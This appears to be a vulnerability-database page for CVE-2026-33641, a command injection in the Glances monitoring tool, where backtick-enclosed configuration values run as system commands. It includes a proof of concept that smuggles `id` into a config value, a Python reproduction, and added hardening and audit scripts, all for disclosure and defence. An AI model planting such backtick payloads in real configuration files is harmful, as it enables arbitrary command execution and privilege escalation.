
Python CVE-2026-33641

Severity: HIGH (CVSS 3.1 base score 7.8, GitHub Advisory)
Weakness: OS Command Injection (CWE-78)
Published: 2026-03-30
Project: https://github.com/nicolargo/glances
Advisory: GHSA-qhj7-v7h7-q4c7

Severity by source

GitHub Advisory (primary): 7.8 HIGH, AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
SUSE: HIGH (qualitative rating)

Primary rating from GitHub Advisory.

CVSS Vector (GitHub Advisory)

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector: Local
Attack Complexity: Low
Privileges Required: Low
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

Analysis Generated: Mar 30, 2026 - 17:15 (vuln.today)
CVE Published: Mar 30, 2026 - 17:01 (nvd)

Blast Radius

Ecosystem impact (transitive dependency graph; vuln.today resolves dependency paths to a depth of 4):
  • 4 pypi packages depend on glances (4 direct, 0 indirect)

Ecosystem-wide dependent count for version 4.5.3.

Description (GitHub Advisory)

Summary

Glances supports dynamic configuration values in which substrings enclosed in backticks are executed as system commands during configuration parsing. This behavior occurs in Config.get_value() and is implemented without validation or restriction of the executed commands.

If an attacker can modify or influence configuration files, arbitrary commands will execute automatically with the privileges of the Glances process during startup or configuration reload. In deployments where Glances runs with elevated privileges (e.g., as a system service), this may lead to privilege escalation.

Details

  1. Glances loads configuration files from user, system, or custom paths during initialization.
  2. When retrieving a configuration value, Config.get_value() scans for substrings enclosed in backticks.

File: glances/config.py

match = self.re_pattern.findall(ret)
for m in match:
    ret = ret.replace(m, system_exec(m[1:-1]))

  3. The extracted string (with the backtick delimiters stripped) is passed directly to system_exec().

File: glances/globals.py

res = subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8')

  4. The command is executed and its output replaces the original configuration value.

This execution occurs automatically whenever the configuration value is read. Note that system_exec() splits the string on spaces and calls subprocess.run() without a shell, so the first token is executed directly as a program with the remaining tokens as its arguments; shell metacharacters are therefore not interpreted, but an arbitrary executable and its arguments still run with the privileges of the Glances process.
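The parsing loop above, placed beside a hardened counterpart, as an added example that is not code from the Glances project or from the advisory. The backtick pattern reproduces the one in the advisory's reproduction snippet (the exact value of Config.re_pattern is not quoted on this page), and the allow-list design, the function names and the sample values are this editor's assumptions, not the upstream fix:

```python
import re
import subprocess

# Any non-empty run of characters between two backticks, shortest match first.
# Assumed to mirror the pattern Config.get_value() scans for; it is the pattern
# used in the advisory's own reproduction snippet.
BACKTICK_RE = re.compile(r'(`.+?`)')


def system_exec(command: str) -> str:
    """Command helper as quoted from glances/globals.py: split on spaces and
    run without a shell, returning stdout as text."""
    return subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode('utf-8').strip()


def expand_value_vulnerable(value: str) -> str:
    """Mirrors the Config.get_value() loop quoted above: every backtick
    expression is executed and replaced by the command's output."""
    for m in BACKTICK_RE.findall(value):
        value = value.replace(m, system_exec(m[1:-1]))
    return value


class UnsafeConfigValue(ValueError):
    """A configuration value requested command substitution that is not allowed."""


def expand_value_hardened(value: str, allowed: frozenset[str] = frozenset()) -> str:
    """Hypothetical hardened variant (an assumption, not the upstream patch):
    substitution is denied by default, and where an operator opts in only
    programs whose first token is on an explicit allow-list may run. The
    configuration file is treated as untrusted input rather than as code."""
    for m in BACKTICK_RE.findall(value):
        command = m[1:-1]
        program = command.split(' ')[0]
        if program not in allowed:
            raise UnsafeConfigValue(
                f"refusing command substitution {command!r}: {program!r} is not allow-listed")
        value = value.replace(m, system_exec(command))
    return value


if __name__ == "__main__":
    # Constructed sample values, not taken from any real Glances deployment.
    print(expand_value_vulnerable("prefix-`echo one`"))
    print(expand_value_hardened("prefix-`echo one`", allowed=frozenset({"echo"})))
    try:
        expand_value_hardened("prefix-`id`")
    except UnsafeConfigValue as exc:
        print("blocked:", exc)
```

Allow-listing only the program name is a coarse control (an allow-listed program can still be handed arbitrary arguments); the safer design is to disable substitution entirely unless the deployment has a documented need for it and the file is writable only by the service account.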

Affected Files

glances/config.py - dynamic configuration parsing

glances/globals.py - command execution helper

Proof of Concept (PoC)

Scenario: Arbitrary command execution via configuration value

Step 1 - Create malicious configuration file

Create /tmp/glances.conf with the following content:

[outputs]
url_prefix = '`id`'

Step 2 - Launch Glances with custom configuration

glances -C /tmp/glances.conf

Step 3 - Observe behavior

When Glances reads the configuration:

  • The command inside backticks is executed
  • Output replaces the configuration value
  • Execution occurs without user interaction

Reproduce using Python code

import subprocess
import re

def system_exec(command):
    # Same behaviour as the helper in glances/globals.py: split on spaces, run without a shell
    return subprocess.run(command.split(' '), stdout=subprocess.PIPE).stdout.decode().strip()

value = "`id`"
pattern = re.compile(r'(`.+?`)')   # matches any backtick-enclosed substring, as Config.get_value() does

for m in pattern.findall(value):
    print(system_exec(m[1:-1]))   # strip the backticks and execute the inner command

Output:

uid=1000(user) gid=1000(user) groups=1000(user)

Impact

Arbitrary Command Execution

Any command enclosed in backticks inside a configuration value will execute with the privileges of the Glances process.

Potential Privilege Escalation

If Glances runs as a privileged service (e.g., root), commands execute with those privileges.

Possible scenarios include:

  • Misconfigured file permissions allowing unauthorized config modification
  • Shared systems where configuration directories are writable by multiple users
  • Container environments with mounted configuration volumes
  • Automated configuration management systems that ingest untrusted data

Analysis (AI)

Command injection in Glances Python monitoring tool allows local authenticated users to execute arbitrary system commands via malicious configuration files. Attackers with write access to Glances configuration files can embed shell commands in backtick-enclosed strings that execute automatically during config parsing with the privileges of the Glances process. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Modify Glances config file with backtick commands
Exploit: Glances parses config during startup
Execution: Execute arbitrary system commands
Impact: Gain privileges of Glances process

Vulnerability Assessment (AI)

Exploitation: Attacker must modify Glances configuration files (e.g., glances.conf) to inject backtick-enclosed system commands. …
Risk Assessment: Real-world risk is moderate to high depending on deployment context. …
Exploit Scenario: An attacker gains low-privileged shell access to a Linux server running Glances as a systemd service with root privileges for comprehensive system monitoring. The attacker discovers the Glances configuration directory /etc/glances/ has overly permissive group-write permissions due to misconfiguration. …
Remediation: Apply vendor-released security patches from the official Glances GitHub repository at https://github.com/nicolargo/glances/security/advisories/GHSA-qhj7-v7h7-q4c7. …

Recommended Action (AI)

Within 24 hours: Inventory all systems running Glances and identify which instances operate with elevated privileges (root or service accounts); restrict file system write permissions on Glances configuration directories to the service account owner only. …
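One way to act on the inventory and permission advice above, as an added audit script that is not part of this page or of the Glances project: it parses each candidate configuration file for backtick expressions without executing them and reports whether the file is writable by anyone other than its owner. The candidate paths, the function names and the sample file contents are assumptions for illustration:

```python
import configparser
import os
import re
import stat
import tempfile

# Same backtick pattern as the advisory's reproduction snippet.
BACKTICK_RE = re.compile(r'(`.+?`)')

# Assumed candidate locations for illustration; the default search paths
# Glances uses are not listed on this page, so replace these as needed.
CANDIDATE_PATHS = [
    "/etc/glances/glances.conf",
    os.path.expanduser("~/.config/glances/glances.conf"),
]


def find_backtick_values(text: str) -> list[tuple[str, str, str]]:
    """Parse INI-style text and return (section, key, command) for every
    backtick expression found in a value. Nothing is executed."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        for key, value in cp.items(section):
            for m in BACKTICK_RE.findall(value):
                findings.append((section, key, m[1:-1]))
    return findings


def permission_flags(mode: int) -> list[str]:
    """Name the write bits on a file mode that would let a user other than
    the owner alter the configuration."""
    flags = []
    if mode & stat.S_IWGRP:
        flags.append("group-writable")
    if mode & stat.S_IWOTH:
        flags.append("world-writable")
    return flags


def audit_config_file(path: str) -> dict:
    """Combine both checks for one file: who may write it, and whether any
    value asks for command substitution."""
    st = os.stat(path)
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    return {
        "path": path,
        "owner_uid": st.st_uid,
        "permission_flags": permission_flags(st.st_mode),
        "substitutions": find_backtick_values(text),
    }


def audit_paths(paths: list[str]) -> list[dict]:
    """Audit every candidate path that exists as a regular file."""
    return [audit_config_file(p) for p in paths if os.path.isfile(p)]


if __name__ == "__main__":
    # Constructed sample file mirroring the layout of the advisory's PoC.
    sample = "[outputs]\nurl_prefix = '`id`'\n\n[global]\nrefresh = 2\n"
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "glances.conf")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(sample)
        os.chmod(path, 0o664)  # group-writable: the misconfiguration the advisory warns about
        for report in audit_paths(CANDIDATE_PATHS + [path]):
            print(report)
```

A finding with a non-empty substitutions list on a file that is group- or world-writable is the combination the exploit scenario above depends on; either condition alone is worth correcting (strip the backtick values, and chmod the file to owner-write only).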



Vendor Status

SUSE

Severity: High
Product Status: openSUSE Tumbleweed - Fixed


CVE-2026-33641 vulnerability details – vuln.today
